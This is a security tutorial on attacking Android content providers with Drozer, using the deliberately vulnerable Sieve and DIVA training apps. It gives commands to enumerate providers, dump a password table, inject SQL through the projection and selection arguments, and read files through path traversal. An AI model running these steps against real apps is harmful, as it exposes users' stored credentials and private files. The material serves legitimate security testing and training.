# Exploiting Content Providers
## Exploiting Content Providers
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## Intro
Data is **supplied from one application to others** on request by a component known as a **content provider**. These requests are managed through the **ContentResolver class** methods. Content providers can store their data in various locations, such as a **database**, **files**, or over a **network**.
In the _Manifest.xml_ file, the declaration of the content provider is required. For instance:
To access `content://com.mwr.example.sieve.DBContentProvider/Keys`, the `READ_KEYS` permission is necessary. It's interesting to note that the path `/Keys/` is accessible in the following section, which is not protected due to a mistake by the developer, who secured `/Keys` but declared `/Keys/`.
**Maybe you can access private data or exploit some vulnerability (SQL Injection or Path Traversal).**
## Get info from **exposed content providers**
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
It's possible to piece together how to reach the **DBContentProvider** by starting URIs with “_content://_”. This approach is based on insights gained from using Drozer, where key information was located in the _/Keys_ directory.
Drozer can **guess and try several URIs**:
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
You should also check the **ContentProvider code** to search for queries:
![](<../../../.gitbook/assets/image (121) (1) (1) (1).png>)
Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
![](<../../../.gitbook/assets/image (186).png>)
The query will be like: `content://name.of.package.class/declared_name`
## **Database-backed Content Providers**
Probably most of the Content Providers are used as **interface** for a **database**. Therefore, if you can access it you could be able to **extract, update, insert and delete** information.\
Check if you can **access sensitive information** or try to change it to **bypass authorisation** mechanisms.
When checking the code of the Content Provider **look** also for **functions** named like: _query, insert, update and delete_:
![](<../../../.gitbook/assets/image (187).png>)
![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1).png>)
Because you will be able to call them
### Query content
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
email: incognitoguy50@gmail.com
### Insert content
Quering the database you will learn the **name of the columns**, then, you could be able to insert data in the DB:
![](<../../../.gitbook/assets/image (188) (1).png>)
![](<../../../.gitbook/assets/image (189) (1).png>)
_Note that in insert and update you can use --string to indicate string, --double to indicate a double, --float, --integer, --long, --short, --boolean_
### Update content
Knowing the name of the columns you could also **modify the entries**:
![](<../../../.gitbook/assets/image (190).png>)
### Delete content
![](<../../../.gitbook/assets/image (191).png>)
### **SQL Injection**
It is simple to test for SQL injection **(SQLite)** by manipulating the **projection** and **selection fields** that are passed to the content provider.\
When quering the Content Provider there are 2 interesting arguments to search for information: _--selection_ and _--projection_:
![](<../../../.gitbook/assets/image (192) (1).png>)
You can try to **abuse** this **parameters** to test for **SQL injections**:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |
| table | Passwords | Passwords | 4 | CREATE TABLE ... |
**Automatic SQLInjection discovery by Drozer**
dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
Injection in Selection:
dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
## **File System-backed Content Providers**
Content providers could be also used to **access files:**
![](<../../../.gitbook/assets/image (193).png>)
### Read **file**
You can read files from the Content Provider
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts localhost
### **Path Traversal**
If you can access files, you can try to abuse a Path Traversal (in this case this isn't necessary but you can try to use "_../_" and similar tricks).
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts localhost
**Automatic Path Traversal discovery by Drozer**
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
## References
* [https://www.tutorialspoint.com/android/android\_content\_providers.htm](https://www.tutorialspoint.com/android/android\_content\_providers.htm)
* [https://manifestsecurity.com/android-application-security-part-15/](https://manifestsecurity.com/android-application-security-part-15/)
* [https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf)
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